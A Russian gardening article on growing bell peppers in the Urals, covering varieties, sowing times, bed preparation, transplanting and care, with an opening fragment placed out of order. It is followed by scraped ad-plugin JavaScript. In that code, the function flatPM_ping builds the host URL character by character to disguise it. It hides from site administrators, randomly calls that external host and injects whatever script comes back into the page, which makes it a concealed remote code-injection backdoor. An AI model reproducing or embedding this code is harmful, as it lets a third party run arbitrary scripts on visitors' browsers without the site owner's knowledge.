Т.к. семена для открытого грунта начинают всходить через 14-30 дней с момента посадки, а после появления ростков до формирования 8-10 листов, пересадки в открытый грунт проходит еще 30-55 дней – оптимальным временем для посадки семян будет начало/средина февраля.

В мини-парниках на улице

Высадку семян в пленочные мини-парники лучше производить с 15-го по 30-е марта, когда длительность светового дня 9-10 ч. Чтобы рассада не желтела, площадку под мини-парником нужно прогреть, так чтобы дневная t в ней была не меньше 20-22°С. Для этого ее очищают, насыпают слой плодородной смеси (земля+перегной+древесная зола), затем на несколько дней накрывают пленкой либо спанбондом. Как избавиться от тли на перцах расскажет эта ссылка.

После посева семян обязательно нужно постоянно следить за t в парнике, чтобы при необходимости его проветрить или дополнительно утеплить.

Когда садить в открытый грунт

Оптимальное время высадки саженцев – последние числа мая/первая декада июня, либо 55-60 дней от появления всходов. Росток должен иметь 8-10 листочков, могут быть первые бутоны.

Чтобы рассада хорошо прижилась, пошла в рост, нужно соблюсти условия: саженцы должны быть закалены, верхний слой грунта – должен быть прогрет до 12°С, средняя t воздуха – не

Посадка и уход за рассадой перца на Урале в теплице и открытом грунте

Без этого овоща трудно представить как заготовки, так и огород. Поскольку перец очень любит тепло и свет, его высадка возможна не в любых условиях. Эта капризная культура даже на юге без соответствующего ухода обильный урожай не даст, а на Урале вообще кроме листьев и цветов можно ничего и не увидеть. В последнее время селекционеры пытаются вывести более стойкие к холоду сорта, все же, выращивание перца в открытом грунте или даже в теплице, потребует много сил и стараний.

Лучшие сорта для Урала

Один из самых популярных видов перца – это болгарский. Конечно, эта культура требует большого внимания и ухода, однако она устойчива к неблагоприятным условиям, таким как холодное и короткое лето.

Самые лучшие сорта болгарского перца должны характеризоваться высокой продуктивностью, устойчивостью к непростым условиям и обязательно иметь превосходные вкусовые и товарные качества.

Вот несколько сортов и присущие им характеристики:

  • Ода фиолетовая – этот куст прямостоящий, низкорослый с сильным стеблем, плоды которого кубовидной формы и фиолетового оттенка. Средний вес одного плода примерно 100 – 150 г, урожайность средняя – около 6 кг с одного квадратного метра. Одно из основных достоинств этого сорта перца для Урала – устойчивость к болезням.
  • Фехер. Плоды этого перца отличаются призмовидной формой, сочностью, сладостью и имеют желтоватый цвет. Сам куст штамбового типа, а его максимальная высота 60 см. Однако урожайность данного куста меньшая от предыдущего сорта – всего 2,5-5,5 кг с квадратного метра.
  • Трапез имеет огромную урожайность (около 12 кг с одного квадратного метра), плод которого весит от 150 до 180 г. Достоинство этого перца заключается в долгом хранении, а также в стабильной урожайности. Плоды темно-зеленого цвета призмовидной формы, с очень сочной и нежной мякотью. Куст этого типа полураскидыстый, полудетерминантный, высотой примерно 80 см.
  • Сорт Никита, высотой не более 70 см, куст штамбового типа, а плоды желтовато-красные, с сочной и вкусной мякотью и кубовидной формы. Такой перец не больших размеров и веса (всего около 70 г). Однако он универсален в использовании.

  • Тритон – это быстророслое, ветвистое растение высотой до 60 см. Плоды ярко-красные, очень сочные и веретеновидной формы. Преимущество в идеальном товарном виде и в хорошей урожайности (примерно от 9,5 до 10,5 кг с квадратного метра).
  • Плоды Интервента красные с крепкой, ароматной и сладкой мякотью, сердцевидно-призмовидной формы. Масса такого плода примерно 225 г, а урожайность от 8 до 10 кг с квадратного метра. Куст ветвистый, сильнорослый и полураскидыстый. Плюсы состоят в большой продуктивности и в замечательном вкусе.
  • Медаль – высокорослый, компактный и хорошо облиственный куст, плоды которого сладкие, красные и широкой призмовидной формы. По весу плоды достигают всего 60 г, и урожайность относительно небольшая – около 7 кг. Однако этот сорт устойчив, несмотря на новосибирский климат, к сильным перепадам температуры.
  • Последний сорт, который можно сажать на Урале – Заря. Это один из очень ранних сортов перца отменного качества. Плоды красивого кремово-желтого или красного цвета. Вес одного перца от 280 до 300 г, а урожайность до одной тонны с сотки. Растение среднерослое и раскидистое.

Правильный выбор участка для посадки

Главное правило при выборе участка для посадки перца – это чем больше солнца, тем лучше. Важно, чтобы в течение дня он находился под солнцем, и не попадал в теневое укрытие.

Следующий момент заключается в том, чтобы он рос в рыхлой почве, богатой питательными веществами. Однако не нужно его чересчур удобрять пометом или свежим коровяком, а также различными микроэлементами и препаратами.

Место для посадки должно быть защищено от сквозняков и сильных порывов ветра. Также они лучше растут в почве умеренного полива, и не любят избыток влаги.

Не стоит забывать и о севообороте. Основные правила просты: лучшие предшественники – фасоль, капуста, горох и огурцы; лучшие соседи – томаты, так как отпугивают тлю от этого нежного растения. Запах кустовой фасоли в этом отношении тоже эффективен, он отпугнет любых вредителей, которые вздумают помешать ростку перца. Со стороны севера, традиционно сажают кукурузу, чтобы та защитила овощное растение от холодных ветров.

Подготовка грядки

Для дальнейшего правильного развития рассады, необходимо подобрать время при переселении на улицу. Огородников часто волнует вопрос о том, когда высаживать посадочный материал. Это время наступает, когда проходят заморозки, и припадает на май месяц на юге, а в Сибири на середину июня.

Есть некоторые секреты, которые способствуют хорошему росту саженцев и обильному урожаю. Обычно грядку готовят заранее и в несколько этапов. Ближе к осени, следует перекопать грунт, положив в землю немного удобрения с фосфором, азотом и калием. При наступлении весны и потепления, аммиачной селитрой нужно обработать каждый квадратный метр. Во избежание болезней, за пару дней до переселения ростков, грунт советуется полить следующим раствором: на ведро воды развести одну ложку медного купороса.

Перцы слишком хорошо переопыляются, чтобы сажать разные сорта рядом. Для получения чистых сортов, лучше выделить разные уголки на расстоянии друг от друга. Если это невозможно из-за скудных размеров огорода, можно сделать ширму из растений повыше. Для этого подойдет вышеупомянутая кукуруза или фасоль.

И самое главное – сладкие сорта перца никогда не сажайте возле горьких, иначе весь урожай будет горьким.

Когда возраст рассады достигает около 55-60 дней после посева, возможна высадка в открытый грунт, учитывая две недели на всходы. Это происходит примерно в конце мая, когда температура воздуха ночью не опускается ниже +14-16 градусов. В свою очередь, это означает, что семена следует сеять ближе к середине марта, а для тепличных условий, семена высеваются в середине февраля.

Пересадка в открытую почву

Выбирается для этого важного шага облачная погода. А еще лучше начать высаживать перец с утра или ближе к вечеру, когда посадка перца не попадает под прямые палящие лучи солнца. Во избежание повреждения корня расточка, следует полить грунт в стаканчиках, чтобы он выпал одним комом. Так как листочки очень нежные, за ними, во время всего процесса, тоже стоит следить. Схема 40*40 см считается самой оптимальной для посадки и ухода за рассадой перца на Урале. Глубину ямки рекомендуется сделать немного больше высоты емкости, и залить двумя литрами теплой воды.

Саженцы устанавливаются вертикально, корни засыпаются землей, а листья привязываются к колышку.

Далее следует сооружение парника из пленки. Количество слоев зависит от степени холода, характерного местности. Появление новых листьев, послужит хорошим признаком того, что расточек принялся и окреп. Однако на Урале не следует расслабляться, там лето полно сюрпризов, и пленка с укрывным материалом всегда должна быть под рукой.

Соответствующий уход

Дальнейший уход за рассадой на Урале состоит из следующих шагов:

  • систематические поливы при отсутствии сильной жары (раз в два дня);
  • разрыхление грунта (5-7 раз во время сезона);
  • удобрение растений 2-3 раза за сезон;
  • прополка.

Все старания, касательно ухода за болгарским выращиваемым перцем, должны быть направлены на формирование наиболее комфортных условий для развития этого привередливого растения. Это обычные для огородных культур процедуры, которых вполне хватает для хорошего урожая. Для чрезвычайно обильного урожая, существует еще несколько секретов:

  • увлажнение земли, кроме последнего полмесяца;
  • приманка пчел с помощью блюдечек с сиропом, или путем опрыскивания им листьев;
  • правильное формирование куста, которое препятствует развитию ненужных побегов;
  • удаление лишних ростков каждые 10 дней;
  • обязательный полив грядки после подкормки.

Огромной ошибкой считается высевка раньше срока, в результате которой рассада перерастает, и на ней появляется цветение и даже перчинки. Это чревато длительными заболеваниями и отставаниями в развитии растения. Если все сделать правильно и вовремя, рост заметен уже в течение недели.

Формировка кустов перца

Очень важным при выращивании среднерослых и высокорослых растений перца, является формирование, ведь от этого будет зависеть и сам урожай. После обрезания нескольких листьев на стволе растения, взойдет примерно 3 боковых побега. Из них следует выбрать два сильных побега, которые будут скелетом растения, а слабые побеги необходимо прищипнуть на один лист.

После того как побеги начнут ветвиться, нужно выбрать самый сильный побег, и он будет в качестве основного ростка. Более слабые побеги следует прищипнуть за первым листком, при этом оставив один плод.

Более того, каждые пару дней необходимо отрезать листья, боковые и бесплодные побеги, которые находятся ниже разветвления главного стебля. Крайне важно каждую ветвь у среднерослых и высокорослых растений осторожно привязывать, потому что они хрупкие и легко ломаются.

Несмотря на то, что выращивание перцев влечет за собой много трудностей, результат того стоит. Ведь сегодня существует множество блюд, где применяется перец, благодаря которому разнообразится ваш стол. Его можно использовать свежим, консервированным и замороженным. Вырастите перец по данной технологии и получите отменный урожай.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};